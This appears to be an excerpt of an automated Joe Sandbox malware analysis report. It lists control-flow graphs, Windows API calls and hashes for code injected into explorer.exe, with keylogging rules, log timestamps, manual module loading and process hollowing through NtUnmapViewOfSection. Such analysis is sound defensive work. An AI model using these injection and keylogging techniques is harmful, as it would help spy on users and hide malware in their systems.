                                                                                                                              • Instruction ID: 466416e3889043d27a92e0c9507d5c52abc5c9b6e0e2f7c45a8cb3c4412a6a57
                                                                                                                              • Opcode Fuzzy Hash: e31d2850cf18d6bd65ed8047d3313147005f8553b71b544cc616f737de12b8dd
                                                                                                                              • Instruction Fuzzy Hash: 28018430510B01ABD32467A5DC7D52E3EA9FB92753B10002AF805862B1EA309D0DABA2

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 409 5512ae-5512bf 410 5512c5-5512c7 409->410 411 5513a6-5513ad 409->411 410->411 412 5512cd-5512cf 410->412 413 5512d4 call 5529bd 412->413 414 5512d9-5512fc lstrlen call 552a09 413->414 417 55136e-551377 call 5529eb 414->417 418 5512fe-551327 call 552841 RtlZeroMemory 414->418 423 55139d-5513a5 call 5529ae 417->423 424 551379-55137d 417->424 425 551353-551369 RtlMoveMemory call 552569 418->425 426 551329-55134f RtlMoveMemory call 552569 418->426 423->411 427 55137f-551392 call 55255c PathMatchSpecA 424->427 425->417 426->418 435 551351 426->435 436 551394-551397 427->436 437 55139b 427->437 435->417 436->427 438 551399 436->438 437->423 438->423
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 005529BD: VirtualAlloc.KERNEL32(00000000,00040744,00003000,00000040,005512D9,00000000,00000000,?,00000001), ref: 005529C7
                                                                                                                              • lstrlen.KERNEL32(00000000,00000000,00000000,?,00000001), ref: 005512DC
                                                                                                                                • Part of subcall function 00552A09: GetProcessHeap.KERNEL32(00000008,0000A000,005510BF), ref: 00552A0C
                                                                                                                                • Part of subcall function 00552A09: RtlAllocateHeap.NTDLL(00000000), ref: 00552A13
                                                                                                                              • PathMatchSpecA.SHLWAPI(?,00000000), ref: 0055138A
                                                                                                                                • Part of subcall function 00552841: lstrlen.KERNEL32(00000000,?,?,00000001,00000000,00551119,00000001), ref: 00552850
                                                                                                                                • Part of subcall function 00552841: lstrlen.KERNEL32(keylog_rules=,?,?,00000001,00000000,00551119,00000001), ref: 00552855
                                                                                                                              • RtlZeroMemory.NTDLL(00000000,00000104), ref: 00551316
                                                                                                                              • RtlMoveMemory.NTDLL(00000000,?,?), ref: 00551332
                                                                                                                                • Part of subcall function 00552569: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,0055136E), ref: 00552591
                                                                                                                                • Part of subcall function 00552569: RtlMoveMemory.NTDLL(00000FA4,00000000,00000000), ref: 0055259A
                                                                                                                              • RtlMoveMemory.NTDLL(00000000,?,?), ref: 0055135F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000013.00000002.4175444287.0000000000551000.00000040.80000000.00040000.00000000.sdmp, Offset: 00551000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_19_2_551000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Memorylstrlen$Move$Heap$AllocAllocateMatchPathProcessSpecVirtualZero
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2993730741-0
                                                                                                                              • Opcode ID: c065fef3e07224df19675b364499967e598978f212eb9e8aba4532fc7a726bf0
                                                                                                                              • Instruction ID: 982df5d1b01b870ac92a2cdc3295e202544b357690f2f70cef2b9cd4b8e6c928
                                                                                                                              • Opcode Fuzzy Hash: c065fef3e07224df19675b364499967e598978f212eb9e8aba4532fc7a726bf0
                                                                                                                              • Instruction Fuzzy Hash: 322169707047029B8300AF2898B9A3EBF99BBD4712F11092FBC56D7641DB24E94D8B66
                                                                                                                              APIs
                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 005515A9
                                                                                                                              • lstrlenW.KERNEL32(00000000), ref: 005515C6
                                                                                                                              • lstrcatW.KERNEL32(00000000,00000000), ref: 005515DC
                                                                                                                              • lstrlenW.KERNEL32(00000000), ref: 00551600
                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 0055161C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000013.00000002.4175444287.0000000000551000.00000040.80000000.00040000.00000000.sdmp, Offset: 00551000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_19_2_551000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Globallstrlen$LockUnlocklstrcat
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1114890469-0
                                                                                                                              • Opcode ID: 8a0ffe5c5fc48ed26b328accd6a4aeed2d4e09aed5bd6d20c65d3ae3ee67ea91
                                                                                                                              • Instruction ID: 4e85673e20b26e7c76bc87515b61a24c5476b4da0689644b0bccfa92367be583
                                                                                                                              • Opcode Fuzzy Hash: 8a0ffe5c5fc48ed26b328accd6a4aeed2d4e09aed5bd6d20c65d3ae3ee67ea91
                                                                                                                              • Instruction Fuzzy Hash: 3A01E932A00A015B872567B95CBC77E6EAEBBD6353B080127FC0A92661EE348D0E5658
                                                                                                                              APIs
                                                                                                                              • RtlMoveMemory.NTDLL(?,?,?), ref: 00551BF4
                                                                                                                              • LoadLibraryA.KERNEL32(?,00555848,00000000,00000000,74DF2EE0,00000000,005519B6,?,?,?,00000001,?,00000000), ref: 00551C1C
                                                                                                                              • GetProcAddress.KERNEL32(00000000,-00000002), ref: 00551C49
                                                                                                                              • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 00551C9A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000013.00000002.4175444287.0000000000551000.00000040.80000000.00040000.00000000.sdmp, Offset: 00551000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_19_2_551000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3827878703-0
                                                                                                                              • Opcode ID: ccd083dd821c4d2d861a5ce5c927461df229816f4d7f130cabdd096ce4b40394
                                                                                                                              • Instruction ID: c8fde1038128b380d6a386bc076f13ea16026ab3e313320b5604bdc98643afc0
                                                                                                                              • Opcode Fuzzy Hash: ccd083dd821c4d2d861a5ce5c927461df229816f4d7f130cabdd096ce4b40394
                                                                                                                              • Instruction Fuzzy Hash: EB31C271640A11ABCB18CF29C9A4B66BFA8BF15316B14452EEC4AC7200D732EC49DBA4
                                                                                                                              APIs
                                                                                                                              • OpenProcess.KERNEL32(00000400,00000000,?,?,00000001,?,00000000,005511DD), ref: 005526DB
                                                                                                                              • IsWow64Process.KERNEL32(000000FF,?), ref: 005526ED
                                                                                                                              • IsWow64Process.KERNEL32(00000000,?), ref: 00552700
                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00552716
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000013.00000002.4175444287.0000000000551000.00000040.80000000.00040000.00000000.sdmp, Offset: 00551000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_19_2_551000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Process$Wow64$CloseHandleOpen
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 331459951-0
                                                                                                                              • Opcode ID: 14645345394e90a75995924441b82a651fb364d78d7be7356862ca363e07ea2f
                                                                                                                              • Instruction ID: f35fea89086bc5a7c1cf3e1be92f648fe61c6c7cb7318c819fab599c5b917089
                                                                                                                              • Opcode Fuzzy Hash: 14645345394e90a75995924441b82a651fb364d78d7be7356862ca363e07ea2f
                                                                                                                              • Instruction Fuzzy Hash: A3F09672811318FFDB10CF919D5C8AEBBBCEE09292F10025AE90593190D7304F08A7A0
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00552A09: GetProcessHeap.KERNEL32(00000008,0000A000,005510BF), ref: 00552A0C
                                                                                                                                • Part of subcall function 00552A09: RtlAllocateHeap.NTDLL(00000000), ref: 00552A13
                                                                                                                              • GetLocalTime.KERNEL32(?,00000000), ref: 005517F3
                                                                                                                              • wsprintfW.USER32 ref: 0055181D
                                                                                                                              Strings
                                                                                                                              • [%02d.%02d.%d %02d:%02d:%02d], xrefs: 00551817
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000013.00000002.4175444287.0000000000551000.00000040.80000000.00040000.00000000.sdmp, Offset: 00551000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_19_2_551000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Heap$AllocateLocalProcessTimewsprintf
                                                                                                                              • String ID: [%02d.%02d.%d %02d:%02d:%02d]
                                                                                                                              • API String ID: 377395780-613334611
                                                                                                                              • Opcode ID: 85ffef8e13a2dd334ce464acdd1b648aefd2463065237041746d35c4b0b3dc22
                                                                                                                              • Instruction ID: 973ac10a75ff935e5c9dc560d4081d0ce02158eb87fdad54e7118d846b3e73c1
                                                                                                                              • Opcode Fuzzy Hash: 85ffef8e13a2dd334ce464acdd1b648aefd2463065237041746d35c4b0b3dc22
                                                                                                                              • Instruction Fuzzy Hash: 3DF03761900128BAC71457DA9C558FFB7FCEB0C742F00015BFE45D1180E5785A54D3B5

                                                                                                                              Callgraph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              • Opacity -> Relevance
                                                                                                                              • Disassembly available
                                                                                                                              callgraph 0 Function_00FC1BF8 1 Function_00FC18F8 2 Function_00FC26F8 10 Function_00FC1C6C 2->10 19 Function_00FC2664 2->19 83 Function_00FC2580 2->83 3 Function_00FC1EF8 4 Function_00FC14F9 5 Function_00FC5579 6 Function_00FC1EFA 7 Function_00FC20F4 7->1 21 Function_00FC1860 7->21 23 Function_00FC1FDC 7->23 32 Function_00FC18D0 7->32 41 Function_00FC19BC 7->41 46 Function_00FC1838 7->46 51 Function_00FC20AC 7->51 70 Function_00FC188C 7->70 71 Function_00FC1F0C 7->71 8 Function_00FCAFF6 9 Function_00FC1576 11 Function_00FC156C 12 Function_00FCA8E8 13 Function_00FC3068 13->10 13->21 45 Function_00FC1938 13->45 13->46 52 Function_00FC2E2C 13->52 14 Function_00FC18E8 15 Function_00FC2768 57 Function_00FC27A0 15->57 16 Function_00FCC0E9 17 Function_00FCADEA 18 Function_00FCB46A 20 Function_00FC1560 21->10 22 Function_00FCAFE3 23->1 23->46 24 Function_00FCB2DF 25 Function_00FCB358 54 Function_00FCB4A8 25->54 26 Function_00FC3158 27 Function_00FCB15B 28 Function_00FC1254 29 Function_00FC14D4 30 Function_00FC1D54 31 Function_00FCABD7 33 Function_00FCAAD2 34 Function_00FC1C4C 35 Function_00FCABCF 36 Function_00FCB148 37 Function_00FC4048 38 Function_00FC34C4 38->0 38->10 38->21 38->34 38->41 38->46 50 Function_00FC1CAC 38->50 56 Function_00FC1D24 38->56 65 Function_00FC3394 38->65 74 Function_00FC1A88 38->74 76 Function_00FC1D04 38->76 77 Function_00FC2A04 38->77 39 Function_00FC27C4 40 Function_00FC2DC0 40->46 42 Function_00FC2FBC 42->52 43 Function_00FCB2BE 43->54 44 Function_00FC24B8 44->7 44->21 44->46 45->21 45->46 47 Function_00FCAAB0 48 Function_00FC14B2 49 Function_00FC4233 51->74 52->21 52->40 52->70 53 Function_00FC31AC 53->2 53->21 53->30 53->46 55 Function_00FC25A8 53->55 67 Function_00FC1B10 53->67 54->18 55->15 55->32 55->83 58 Function_00FC1822 59 Function_00FCAB9C 60 Function_00FC1E9C 61 Function_00FC1E1C 61->46 62 Function_00FC141D 63 Function_00FC2918 64 Function_00FC2D14 64->14 64->21 64->44 64->46 64->61 65->3 65->14 65->21 65->32 65->46 65->60 65->74 66 Function_00FC4817 68 Function_00FCB291 69 Function_00FC370C 69->10 69->38 69->46 69->53 69->69 70->46 72 Function_00FCAC8D 73 Function_00FC1508 75 Function_00FC5289 77->10 77->39 77->63 78 Function_00FC1405 79 Function_00FCB007 80 Function_00FC1F00 81 Function_00FCAD00 82 Function_00FC1000 84 Function_00FCA881 85 Function_00FC4203

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 116 fc370c-fc371c call fc1c6c 119 fc37b0-fc37b5 116->119 120 fc3722-fc3754 call fc1838 116->120 124 fc3785-fc37aa NtUnmapViewOfSection 120->124 125 fc3756-fc375b call fc1838 120->125 129 fc37bc-fc37cb call fc34c4 124->129 130 fc37ac-fc37ae 124->130 128 fc3760-fc3779 125->128 128->124 136 fc37cd-fc37d0 call fc370c 129->136 137 fc37d5-fc37de 129->137 130->119 131 fc37b6-fc37bb call fc31ac 130->131 131->129 136->137
                                                                                                                              APIs
                                                                                                                              • NtUnmapViewOfSection.NTDLL ref: 00FC378C
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000015.00000002.4175091353.0000000000FC1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FC1000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_21_2_fc1000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: SectionUnmapView
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 498011366-0
                                                                                                                              • Opcode ID: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
                                                                                                                              • Instruction ID: 1c2d18e5ad58739d1eebb53d340d5e12c685f09336f38e8cccf50b869a23d624
                                                                                                                              • Opcode Fuzzy Hash: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
                                                                                                                              • Instruction Fuzzy Hash: FF11E674A0590A0FFB5CFB78999EB7533D1FB44312F54802EA815C72A2DE3DCA909300

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 0 fcb4a8-fcb4ab 1 fcb4b5-fcb4b9 0->1 2 fcb4bb-fcb4c3 1->2 3 fcb4c5 1->3 2->3 4 fcb4ad-fcb4b3 3->4 5 fcb4c7 3->5 4->1 6 fcb4ca-fcb4d1 5->6 8 fcb4dd 6->8 9 fcb4d3-fcb4db 6->9 8->6 10 fcb4df-fcb4e2 8->10 9->8 11 fcb4e4-fcb4f2 10->11 12 fcb4f7-fcb504 10->12 13 fcb52e-fcb549 11->13 14 fcb4f4-fcb4f5 11->14 26 fcb51e-fcb52c call fcb46a 12->26 27 fcb506-fcb508 12->27 15 fcb57a-fcb57d 13->15 14->12 17 fcb57f-fcb580 15->17 18 fcb582-fcb589 15->18 19 fcb561-fcb565 17->19 20 fcb58f-fcb593 18->20 24 fcb54b-fcb54e 19->24 25 fcb567-fcb56a 19->25 22 fcb595-fcb5ae LoadLibraryA 20->22 23 fcb5f0-fcb5f9 20->23 29 fcb5af-fcb5b6 22->29 33 fcb5fc-fcb605 23->33 24->18 30 fcb550 24->30 25->18 31 fcb56c-fcb570 25->31 26->1 32 fcb50b-fcb512 27->32 29->20 35 fcb5b8 29->35 36 fcb551-fcb555 30->36 31->36 37 fcb572-fcb579 31->37 50 fcb51c 32->50 51 fcb514-fcb51a 32->51 38 fcb62a-fcb67a VirtualProtect * 2 33->38 39 fcb607-fcb609 33->39 41 fcb5ba-fcb5c2 35->41 42 fcb5c4-fcb5cc 35->42 36->19 43 fcb557-fcb559 36->43 37->15 40 fcb67e-fcb683 38->40 45 fcb61c-fcb628 39->45 46 fcb60b-fcb61a 39->46 40->40 47 fcb685-fcb694 40->47 48 fcb5ce-fcb5da 41->48 42->48 43->19 49 fcb55b-fcb55f 43->49 45->46 46->33 54 fcb5dc-fcb5e3 48->54 55 fcb5e5-fcb5ef 48->55 49->19 49->25 50->26 50->32 51->50 54->29
                                                                                                                              APIs
                                                                                                                              • LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,?,7473604B), ref: 00FCB5A7
                                                                                                                              • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 00FCB651
                                                                                                                              • VirtualProtect.KERNELBASE ref: 00FCB66F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000015.00000002.4175091353.0000000000FCA000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FCA000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_21_2_fca000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ProtectVirtual$LibraryLoad
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 895956442-0
                                                                                                                              • Opcode ID: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
                                                                                                                              • Instruction ID: 0c9a4214d8b94e4c99022b6da7ce01d6cc2ca00752c537226efb0a7cde00d833
                                                                                                                              • Opcode Fuzzy Hash: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
                                                                                                                              • Instruction Fuzzy Hash: 77517A36B5891F4BCB24AA789D87BF4B7C1F755335F1C0A2EC48AC3289D759C846A381

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00FC1BF8: OpenFileMappingA.KERNEL32 ref: 00FC1C0F
                                                                                                                                • Part of subcall function 00FC1BF8: MapViewOfFile.KERNELBASE ref: 00FC1C2E
                                                                                                                              • SysFreeMap.PGOCR ref: 00FC36F7
                                                                                                                              • SleepEx.KERNELBASE ref: 00FC3701
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000015.00000002.4175091353.0000000000FC1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FC1000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_21_2_fc1000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$FreeMappingOpenSleepView
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4205437007-0
                                                                                                                              • Opcode ID: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
                                                                                                                              • Instruction ID: 4e027fb55c6863e8b0d8ebad822d82ab0bbd41691bd18e88c503471dd632914c
                                                                                                                              • Opcode Fuzzy Hash: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
                                                                                                                              • Instruction Fuzzy Hash: AD51A630608A098FDB19FB28DD5AFAA73E1FB95350F44461DE44BC32A2DF38DA159781

                                                                                                                              Control-flow Graph

                                                                                                                              • Executed
                                                                                                                              • Not Executed
                                                                                                                              control_flow_graph 113 fc1bf8-fc1c18 OpenFileMappingA 114 fc1c1a-fc1c38 MapViewOfFile 113->114 115 fc1c3b-fc1c48 113->115 114->115
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000015.00000002.4175091353.0000000000FC1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FC1000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_21_2_fc1000_explorer.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: File$MappingOpenView
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3439327939-0
                                                                                                                              • Opcode ID: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
                                                                                                                              • Instruction ID: ffd9cd7256469e67a6c5fe8db13535bd9f2f1ccd79929ed5c11a8877a6105e38
                                                                                                                              • Opcode Fuzzy Hash: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
                                                                                                                              • Instruction Fuzzy Hash: A1F08234314F0D4FAB44EF7C9C9C235B7E0EBA8202740857EA84AC6165EF34C8408701